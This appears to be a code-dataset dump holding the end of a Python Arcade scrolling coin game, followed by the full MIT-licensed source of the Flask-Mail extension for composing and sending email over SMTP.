Called when the user presses a mouse button.
"""
if key == arcade.key.LEFT or key == arcade.key.RIGHT:
self.player_sprite.change_x = 0
def on_update(self, delta_time):
self.physics_engine.update()
self.coin_list.update()
hit_list = arcade.check_for_collision_with_list(self.player_sprite, self.coin_list)
if len(hit_list)>0:
for pening in hit_list:
pening.remove_from_sprite_lists()
self.score=self.score+1
# --- Manage Scrolling ---
# Keep track of if we changed the boundary. We don't want to call the
# set_viewport command if we didn't change the view port.
changed = False
# Scroll left
left_boundary = self.view_left + VIEWPORT_MARGIN
if self.player_sprite.left < left_boundary:
self.view_left -= left_boundary - self.player_sprite.left
changed = True
# Scroll right
right_boundary = self.view_left + SCREEN_WIDTH - VIEWPORT_MARGIN
if self.player_sprite.right > right_boundary:
self.view_left += self.player_sprite.right - right_boundary
changed = True
# Scroll up
top_boundary = self.view_bottom + SCREEN_HEIGHT - VIEWPORT_MARGIN
if self.player_sprite.top > top_boundary:
self.view_bottom += self.player_sprite.top - top_boundary
changed = True
# Scroll down
bottom_boundary = self.view_bottom + VIEWPORT_MARGIN
if self.player_sprite.bottom < bottom_boundary:
self.view_bottom -= bottom_boundary - self.player_sprite.bottom
changed = True
# Make sure our boundaries are integer values. While the view port does
# support floating point numbers, for this application we want every pixel
# in the view port to map directly onto a pixel on the screen. We don't want
# any rounding errors.
self.view_left = int(self.view_left)
self.view_bottom = int(self.view_bottom)
# If we changed the boundary values, update the view port to match
if changed:
arcade.set_viewport(self.view_left,
SCREEN_WIDTH + self.view_left - 1,
self.view_bottom,
SCREEN_HEIGHT + self.view_bottom - 1)
def main():
window = MyGame()
window.setup()
arcade.run()
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
4e05342bbe67e0b1ef38fe46f34073cc3d59822c | 0567b686db4d05b44a70fdfd7a61ed07f3be1fb4 | /flask_mail.py | 50630a3d0f3206394769458abef4da70620487e8 | [
"MIT"
] | permissive | achiang/flask-unchained | 624271d903a8d2af2c15d83c79571e8b5f91a56e | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | refs/heads/master | 2020-04-19T20:21:10.731764 | 2018-12-29T07:06:14 | 2018-12-29T07:06:14 | 168,411,738 | 0 | 0 | MIT | 2019-01-30T20:39:42 | 2019-01-30T20:39:41 | null | UTF-8 | Python | false | false | 22,070 | py | # -*- coding: utf-8 -*-
"""
flaskext.mail
~~~~~~~~~~~~~
Flask extension for sending email.
Copyright (c) 2010 by danjac.
Some rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* The names of the contributors may not be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import with_statement
import re
import smtplib
import sys
import time
import unicodedata
from contextlib import contextmanager
from email import charset
from email.encoders import encode_base64
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr, formatdate, make_msgid, parseaddr
import blinker
from flask import current_app
try:
from email import policy
message_policy = policy.SMTP
except ImportError:
message_policy = None
__version__ = '0.9.3'
PY3 = sys.version_info[0] == 3
PY34 = PY3 and sys.version_info[1] >= 4
if PY3:
string_types = str,
text_type = str
else:
string_types = basestring, # noqa: F821
text_type = unicode # noqa: F821
charset.add_charset('utf-8', charset.SHORTEST, None, 'utf-8')
class FlaskMailUnicodeDecodeError(UnicodeDecodeError):
def __init__(self, obj, *args):
self.obj = obj
UnicodeDecodeError.__init__(self, *args)
def __str__(self):
original = UnicodeDecodeError.__str__(self)
return '%s. You passed in %r (%s)' % (
original, self.obj, type(self.obj)
)
def force_text(s, encoding='utf-8', errors='strict'):
"""
Similar to smart_text, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if isinstance(s, text_type):
return s
try:
if not isinstance(s, string_types):
if PY3:
if isinstance(s, bytes):
s = text_type(s, encoding, errors)
else:
s = text_type(s)
elif hasattr(s, '__unicode__'):
s = s.__unicode__()
else:
s = text_type(bytes(s), encoding, errors)
else:
s = s.decode(encoding, errors)
except UnicodeDecodeError as e:
if not isinstance(s, Exception):
raise FlaskMailUnicodeDecodeError(s, *e.args)
else:
s = ' '.join([force_text(arg, encoding, errors)
for arg in s])
return s
def sanitize_subject(subject, encoding='utf-8'):
try:
subject.encode('ascii')
except UnicodeEncodeError:
try:
subject = Header(subject, encoding).encode()
except UnicodeEncodeError:
subject = Header(subject, 'utf-8').encode()
return subject
def sanitize_address(addr, encoding='utf-8'):
if isinstance(addr, string_types):
addr = parseaddr(force_text(addr))
nm, addr = addr
try:
nm = Header(nm, encoding).encode()
except UnicodeEncodeError:
nm = Header(nm, 'utf-8').encode()
try:
addr.encode('ascii')
except UnicodeEncodeError: # IDN
if '@' in addr:
localpart, domain = addr.split('@', 1)
try:
localpart = Header(localpart, encoding).encode()
except UnicodeEncodeError:
localpart = Header(localpart, 'utf-8').encode()
domain = domain.encode('idna').decode('ascii')
addr = '@'.join([localpart, domain])
else:
addr = Header(addr, encoding).encode()
return formataddr((nm, addr))
def sanitize_addresses(addresses, encoding='utf-8'):
return map(lambda e: sanitize_address(e, encoding), addresses)
def fix_recipients_list(recipients):
fixed_recipients = []
for recipient in recipients:
if not isinstance(recipient, string_types):
# Ensure that the name/email values are a tuple and not a list
fixed_recipients.append(tuple(recipient))
else:
fixed_recipients.append(recipient)
return fixed_recipients
def _has_newline(line):
"""Used by has_bad_header to check for \\r or \\n"""
if line and ('\r' in line or '\n' in line):
return True
return False
class Connection(object):
"""Handles connection to host."""
def __init__(self, mail):
self.mail = mail
def __enter__(self):
if self.mail.suppress:
self.host = None
else:
self.host = self.configure_host()
self.num_emails = 0
return self
def __exit__(self, exc_type, exc_value, tb):
if self.host and getattr(self.host, 'sock', None):
try:
self.host.quit()
except smtplib.SMTPServerDisconnected:
pass
def configure_host(self):
if self.mail.use_ssl:
host = smtplib.SMTP_SSL(self.mail.server, self.mail.port)
else:
host = smtplib.SMTP(self.mail.server, self.mail.port)
host.set_debuglevel(int(self.mail.debug))
if self.mail.use_tls:
(resp, reply) = host.starttls()
# Fix CVE-2016-0772 on old Python installations
if resp != 200:
raise smtplib.SMTPResponseException(resp, reply)
if self.mail.username and self.mail.password:
host.login(self.mail.username, self.mail.password)
return host
def send(self, message, envelope_from=None):
"""Verifies and sends message.
:param message: Message instance.
:param envelope_from: Email address to be used in MAIL FROM command.
"""
assert message.send_to, "No recipients have been added"
assert message.sender, (
"The message does not specify a sender and a default sender "
"has not been configured")
if message.has_bad_headers():
raise BadHeaderError
if message.date is None:
message.date = time.time()
ret = None
if self.host:
ret = self.host.sendmail(
sanitize_address(envelope_from or message.sender),
list(sanitize_addresses(message.send_to)),
message.as_bytes() if PY3 else message.as_string(),
message.mail_options,
message.rcpt_options
)
email_dispatched.send(message, app=current_app._get_current_object())
self.num_emails += 1
if self.num_emails == self.mail.max_emails:
self.num_emails = 0
if self.host:
self.host.quit()
self.host = self.configure_host()
return ret
def send_message(self, *args, **kwargs):
"""Shortcut for send(msg).
Takes same arguments as Message constructor.
:versionadded: 0.3.5
"""
return self.send(Message(*args, **kwargs))
class BadHeaderError(Exception):
pass
class Attachment(object):
"""Encapsulates file attachment information.
:versionadded: 0.3.5
:param filename: filename of attachment
:param content_type: file mimetype
:param data: the raw file data
:param disposition: content-disposition (if any)
:param content_id: content-id for inline reference
"""
def __init__(self, filename=None, content_type=None, data=None,
disposition=None, headers=None, content_id=None):
self.filename = filename
self.content_type = content_type
self.data = data
self.disposition = disposition or 'attachment'
self.headers = headers or {}
self.content_id = content_id
class Message(object):
"""Encapsulates an email message.
:param subject: email subject header
:param recipients: list of email addresses
:param body: plain text message
:param html: HTML message
:param alts: A dict or an iterable to go through dict() that contains
multipart alternatives
:param sender: email sender address, or **MAIL_DEFAULT_SENDER** by default
:param cc: CC list
:param bcc: BCC list
:param attachments: list of Attachment instances
:param reply_to: reply-to address
:param date: send date
:param charset: message character set
:param extra_headers: A dictionary of additional headers for the message
:param mail_options: A list of ESMTP options to be used in MAIL FROM
:param rcpt_options: A list of ESMTP options to be used in RCPT commands
:param subtype: Media subtype name for a message
"""
def __init__(self, subject='',
recipients=None,
body=None,
html=None,
alts=None,
sender=None,
cc=None,
bcc=None,
attachments=None,
reply_to=None,
date=None,
charset=None,
extra_headers=None,
mail_options=None,
rcpt_options=None,
subtype=None):
sender = sender or current_app.extensions['mail'].default_sender
if isinstance(sender, tuple):
sender = "%s <%s>" % sender
self.recipients = recipients or []
self.subject = subject
self.sender = sender
self.reply_to = reply_to
self.cc = cc or []
self.bcc = bcc or []
self.body = body
self.alts = dict(alts or {})
self.html = html
self.date = date
self.msgId = make_msgid()
self.charset = charset
self.extra_headers = extra_headers
self.subtype = subtype
self.mail_options = mail_options or []
self.rcpt_options = rcpt_options or []
self.attachments = attachments or []
@property
def recipients(self):
return self._recipients
@recipients.setter
def recipients(self, recipients):
self._recipients = fix_recipients_list(recipients)
@property
def cc(self):
return self._cc
@cc.setter
def cc(self, recipients):
self._cc = fix_recipients_list(recipients)
@property
def bcc(self):
return self._bcc
@bcc.setter
def bcc(self, recipients):
self._bcc = fix_recipients_list(recipients)
@property
def send_to(self):
return set(self.recipients) | set(self.bcc or ()) | set(self.cc or ())
@property
def html(self):
return self.alts.get('html')
@html.setter
def html(self, value):
if value is None:
self.alts.pop('html', None)
else:
self.alts['html'] = value
def _mimetext(self, text, subtype=None):
"""Creates a MIMEText object with the given subtype (default: 'plain')
If the text is unicode, the utf-8 charset is used.
"""
subtype = subtype or 'plain'
charset = self.charset or 'utf-8'
return MIMEText(text, _subtype=subtype, _charset=charset)
def _message(self):
"""Creates the email"""
ascii_attachments = current_app.extensions['mail'].ascii_attachments
encoding = self.charset or 'utf-8'
attachments = self.attachments or []
if len(attachments) == 0 and not self.alts:
# No html content and zero attachments means plain text
msg = self._mimetext(self.body, self.subtype)
elif len(attachments) > 0 and not self.alts:
# No html and at least one attachment means multipart
subtype = self.subtype or 'mixed'
msg = MIMEMultipart(_subtype=subtype)
msg.attach(self._mimetext(self.body))
else:
# Anything else
subtype = self.subtype or 'mixed'
msg = MIMEMultipart(_subtype=subtype)
alternative = MIMEMultipart(_subtype='alternative')
alternative.attach(self._mimetext(self.body))
for mimetype, content in self.alts.items():
alternative.attach(self._mimetext(content, mimetype))
msg.attach(alternative)
if self.subject:
msg['Subject'] = sanitize_subject(force_text(self.subject),
encoding)
msg['From'] = sanitize_address(self.sender, encoding)
msg['To'] = ', '.join(
list(set(sanitize_addresses(self.recipients, encoding)))
)
msg['Date'] = formatdate(self.date, localtime=True)
# see RFC 5322 section 3.6.4.
msg['Message-ID'] = self.msgId
if self.cc:
msg['Cc'] = ', '.join(
list(set(sanitize_addresses(self.cc, encoding)))
)
if self.reply_to:
msg['Reply-To'] = sanitize_address(self.reply_to, encoding)
if self.extra_headers:
for k, v in self.extra_headers.items():
msg[k] = v
SPACES = re.compile(r'[\s]+', re.UNICODE)
for attachment in attachments:
f = MIMEBase(*attachment.content_type.split('/'))
f.set_payload(attachment.data)
encode_base64(f)
filename = attachment.filename
if filename and ascii_attachments:
# force filename to ascii
filename = unicodedata.normalize('NFKD', filename)
filename = filename.encode('ascii', 'ignore').decode('ascii')
filename = SPACES.sub(u' ', filename).strip()
try:
filename and filename.encode('ascii')
except UnicodeEncodeError:
if not PY3:
filename = filename.encode('utf8')
filename = ('UTF8', '', filename)
f.add_header('Content-Disposition',
attachment.disposition,
filename=filename)
for key, value in attachment.headers.items():
f.add_header(key, value)
if attachment.content_id:
try:
f.replace_header('Content-ID', attachment.content_id)
except KeyError:
f.add_header('Content-ID', attachment.content_id)
msg.attach(f)
if message_policy:
msg.policy = message_policy
return msg
def as_string(self):
return self._message().as_string()
def as_bytes(self):
return self._message().as_string().encode(self.charset or 'utf-8')
def __str__(self):
return self.as_string()
def __bytes__(self):
return self.as_bytes()
def has_bad_headers(self):
"""
Checks for bad headers i.e. newlines in subject, sender or recipients.
RFC5322 allows multiline CRLF with trailing whitespace (FWS) in headers
"""
headers = [self.sender, self.reply_to] + self.recipients
for header in headers:
if _has_newline(header):
return True
if self.subject:
if _has_newline(self.subject):
for linenum, line in enumerate(self.subject.split('\r\n')):
if not line:
return True
if linenum > 0 and line[0] not in '\t ':
return True
if _has_newline(line):
return True
if len(line.strip()) == 0:
return True
return False
def is_bad_headers(self):
from warnings import warn
warn(DeprecationWarning('is_bad_headers is deprecated, use the'
' new has_bad_headers method instead.'),
stacklevel=1)
return self.has_bad_headers()
def send(self, connection):
"""
Verifies and sends the message.
"""
return connection.send(self)
def add_recipient(self, recipient):
"""
Adds another recipient to the message.
:param recipient: email address of recipient.
"""
self.recipients.append(recipient)
def attach(self,
filename=None,
content_type=None,
data=None,
disposition=None,
headers=None,
content_id=None):
"""
Adds an attachment to the message.
:param filename: filename of attachment
:param content_type: file mimetype
:param data: the raw file data
:param disposition: content-disposition (if any)
:param content_id: content-id
"""
self.attachments.append(
Attachment(filename, content_type, data, disposition,
headers, content_id)
)
class _MailMixin(object):
@contextmanager
def record_messages(self):
"""
Records all messages. Use in unit tests for example::
with mail.record_messages() as outbox:
response = app.test_client.get("/email-sending-view/")
assert len(outbox) == 1
assert outbox[0].subject == "testing"
You must have blinker installed in order to use this feature.
:versionadded: 0.4
"""
if not email_dispatched:
raise RuntimeError("blinker must be installed")
outbox = []
def _record(message, app):
outbox.append(message)
email_dispatched.connect(_record)
try:
yield outbox
finally:
email_dispatched.disconnect(_record)
def send(self, message):
"""
Sends a single message instance. If TESTING is True the message will
not actually be sent.
:param message: a Message instance.
"""
with self.connect() as connection:
return message.send(connection)
def send_message(self, *args, **kwargs):
"""
Shortcut for send(msg).
Takes same arguments as Message constructor.
:versionadded: 0.3.5
"""
return self.send(Message(*args, **kwargs))
def connect(self):
"""
Opens a connection to the mail host.
"""
app = getattr(self, "app", None) or current_app
try:
return Connection(app.extensions['mail'])
except KeyError:
raise RuntimeError("The curent application was"
" not configured with Flask-Mail")
class _Mail(_MailMixin):
def __init__(self, server, username, password, port, use_tls, use_ssl,
default_sender, debug, max_emails, suppress,
ascii_attachments=False):
self.server = server
self.username = username
self.password = password
self.port = port
self.use_tls = use_tls
self.use_ssl = use_ssl
self.default_sender = default_sender
self.debug = debug
self.max_emails = max_emails
self.suppress = suppress
self.ascii_attachments = ascii_attachments
class Mail(_MailMixin):
"""
Manages email messaging
:param app: Flask instance
"""
def __init__(self, app=None):
self.app = app
if app is not None:
self.state = self.init_app(app)
else:
self.state = None
def init_mail(self, config, debug=False, testing=False):
return _Mail(
config.get('MAIL_SERVER', '127.0.0.1'),
config.get('MAIL_USERNAME'),
config.get('MAIL_PASSWORD'),
config.get('MAIL_PORT', 25),
config.get('MAIL_USE_TLS', False),
config.get('MAIL_USE_SSL', False),
config.get('MAIL_DEFAULT_SENDER'),
int(config.get('MAIL_DEBUG', debug)),
config.get('MAIL_MAX_EMAILS'),
config.get('MAIL_SUPPRESS_SEND', testing),
config.get('MAIL_ASCII_ATTACHMENTS', False)
)
def init_app(self, app):
"""Initializes your mail settings from the application settings.
You can use this if you want to set up your Mail instance
at configuration time.
:param app: Flask application instance
"""
state = self.init_mail(app.config, app.debug, app.testing)
# register extension with app
app.extensions = getattr(app, 'extensions', {})
app.extensions['mail'] = state
return state
def __getattr__(self, name):
return getattr(self.state, name, None)
signals = blinker.Namespace()
email_dispatched = signals.signal("email-dispatched", doc="""
Signal sent when an email is dispatched. This signal will also be sent
in testing mode, even though the email will not actually be sent.
""")
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.